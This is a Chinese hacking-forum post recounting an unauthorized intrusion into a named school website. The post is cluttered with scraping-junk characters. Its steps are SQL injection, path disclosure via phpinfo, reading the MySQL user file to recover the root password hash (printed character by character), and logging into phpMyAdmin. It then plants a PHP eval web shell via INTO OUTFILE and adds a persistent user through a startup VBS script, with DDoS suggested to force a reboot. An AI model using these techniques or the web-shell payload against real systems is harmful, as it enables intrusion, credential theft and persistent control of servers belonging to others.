第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
" M9 T& B, n& H; d' S' k9 `% z7 q% V发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!4 v3 B# s; v* i" a; d! o
7 g/ p! u! W' n* S- `+ p) |- Z
4 B! d3 P4 E6 _ O& B; m: o$ {( a" \
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
, n' V! k, V2 ]5 h+ r C* q5 g! Q' W# b
那么想可以直接写入shell ,getshell有几个条件:. e- c/ L' N9 \0 P
1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF
/ i; b" V% h' F/ D: e" \) @- |; N! U
试着爆绝对路径:
/ N. I9 q8 n! C$ S1./phpMyAdmin/index.php?lang[]=1
1 b0 k1 ~$ W$ h3 z/ o2./phpMyAdmin/phpinfo.php . N. d( k( k7 A
3./load_file() 8 }0 L8 R" G" G+ t
4./phpmyadmin/themes/darkblue_orange/layout.inc.php ) g! c& v# n# f* t) ]
5./phpmyadmin/libraries/select_lang.lib.php
7 Q, v- W, t; D* ~! N( g) a6./phpmyadmin/libraries/lect_lang.lib.php
5 U. @; L9 S7 f: q4 X- D, r+ w# C7./phpmyadmin/libraries/mcrypt.lib.php 2 @7 e2 Y2 ^. X4 j" B
8./phpmyadmin/libraries/export/xls.php 1 G h. L3 v2 L& A9 i
; l0 X+ s8 t& D9 F$ |! p, O% m均不行...........................
1 s% K; ~) h) q) Z+ l) k3 U
t Q; l3 i; t6 o; a御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php 7 l I1 x+ e! r9 }
; z4 A* h, w& X' a4 X! R2 S权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
8 o9 x1 g2 g' X" R1 n( ~
0 E) }# x9 S1 U默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败 ) |7 v! A* _ d3 G- ^$ W
1 ^; ]; Z* r2 J5 S
敏感东西: http://202.103.49.66/Admincp.php 社工进不去........... e# D+ N0 ]7 t, w6 p
* [' L' w) _- b, a$ X想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
1 t+ _2 {, V- J2 B# M8 ]# C$ @: Z6 u/ E/ O4 w1 E
http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini ! ?* l3 z1 q& _6 |2 n2 n
! C1 t( t; R' N# E- n
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD 8 g+ P/ R: l5 g' _
* Q; T9 C' k" g% l1 o
成功读到root密码:
, ~8 ?* r" e3 ^' r0 |9 F" i
4 t0 r3 N% _. [& g/ J5 e8 G17---- r(0072) , C( }% W* y6 L# q" h u7 s- _$ i
18---- o(006f)
0 V+ `" F' t( d5 V3 M" L19---- o(006f)
, @8 _8 O# `8 O# }4 R! K20---- t(0074) 3 U h6 r: J& C7 b
21---- *(002a) . G2 ~3 F$ L+ U" Y0 f
22---- 8(0038)
L, ~/ a' Q- }7 s6 @, J6 o1 _23---- 2(0032) ! P1 u$ H3 i# F5 }
24---- E(0045)
1 G% j6 L" h8 z o25---- 1(0031) ! n, C/ r: n! Q, \
26---- C(0043)
. l- f# z0 p# f" D# z27---- 5(0035)
% |- N# E5 P, T+ C# d c, R$ {28---- 8(0038)
0 f K2 P+ L* V; V) A; i29---- 2(0032)
& M. z% Y5 x. f" }$ y30---- 8(0038)
2 V6 z8 }' B7 h* Y" s, b% Z1 T31---- A(0041)
3 M M! y: q8 K/ T32---- 9(0039)
$ s" s, y' {/ x. ?; V! n6 p3 t+ N33---- B(0042)
- H+ s+ W' J+ i34---- 5(0035) : p+ m1 {, g( S! S
35---- 4(0034) + b4 v0 B6 s" f d
36---- 8(0038)
/ B+ z) t9 X, N' ^: l2 S) Q6 B37---- 6(0036) 4 @1 k" N; {' N8 l8 J g) Z8 V
38---- 4(0034)
# M4 n$ T5 F9 l- k6 F! y39---- 9(0039) * J! t. u: w% ?6 n0 K: u6 ~4 X
40---- 1(0031) 7 U& ]; s" W0 _# x: k8 j/ z4 `8 q
41---- 1(0031)
8 r5 Y5 v6 f+ v) X42---- 5(0035) * A; a& d; |& @' t
43---- 3(0033)
0 ~: b9 J7 w- I; z0 L: z44---- 5(0035)
* g8 b7 h5 s- M4 h9 [3 A3 u45---- 9(0039) 5 ~; h6 j; R1 O4 w5 n: y8 J
46---- 8(0038)
/ {1 ~! Y% c# o47---- F(0046) % U, Y9 z/ ~& H
48---- F(0046) + z, `. C- Z: R" o- @
49---- 4(0034) 4 K y0 R2 |5 m& N. Y7 j
50---- F(0046) $ W) x: M. X; c, }
51---- 0(0030) 5 P1 o4 z ?. a& M
52---- 3(0033)
7 \% {" L/ c" {! f6 b1 F53---- 2(0032)
! K8 P/ a2 I" k; D& T* e54---- A(0041)
' \1 j- q; m. X55---- 4(0034) 9 k+ V @9 [& p; I- F
56---- A(0041)
2 W2 Q8 K5 k" P4 Y+ X57---- B(0042)
: L: G p0 X, G% M3 M9 z58---- *(0044)
5 V# R0 a& \3 C59---- *(0035) ! i! m v) O8 q/ f0 N
60---- *(0041) 5 P% s8 E4 s( `* _" _/ Y8 I
61---- *0032) 4 x& w/ B! v. m+ `; n; u' w3 Y
* ^+ O) F, L4 c* `3 L* D解密后成功登陆phpmyamin
9 L( k9 ~$ p% w* } $ D7 z( `2 P) R8 h/ |
7 v8 h* F5 p( c4 Y( L 4 V8 L) U0 Y. E7 e, y6 c
; ?! X6 A* t$ \! \. W6 k2 n
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php' $ P6 B4 {9 z; ~8 b, d& j
1 W. h" {& d. T2 W
成功执行,拿下shell,菜刀连接:
5 d5 P7 J0 y* o) S w0 f D& E W1 ~9 \
服务器不支持asp,aspx,php提权无果................... & a6 k/ g( ]) B P s
j% R" }6 b# z" w6 W
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里: % V1 i, h, b" ?/ k" L( I1 B8 n
服务器上已经有个隐藏帐号了
, ~6 S& \. O; {# {别名 administrators. ]# w' ], W, T, l( t
注释 管理员对计算机/域有不受限制的完全访问权
% K* @2 o8 U! Z3 S, n7 \+ _成员 2 g( L9 S7 ^/ Y0 h. h$ y# h
-------------------------------------------------------------------------------5 P, V, s' E- L, ^
admin
, L) a% C# M9 U: D. n+ TAdministrator
4 W7 a. T! i( a3 ^# Fslipper$' a+ v' y5 Y! ]" `5 @, R
sqluser' G$ q. U+ f3 z
命令成功完成。
6 }: ~0 r! [! V$ ?& Z a" p5 H* q2 C5 \4 @: x# ^* X
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。+ g% C' G$ Q6 t
! d* k* V5 Y; B3 Y) jddos服务器重启,不然就只能坐等服务器重启了...............................
! r* N5 u; ]5 M9 Z# k' W6 U
# ?' w7 |- d; o& \
; I" x4 C6 K6 W | 
发表于 2013-1-11 21:32:15
收藏
支持
反对
发表于 2013-5-20 15:28:12
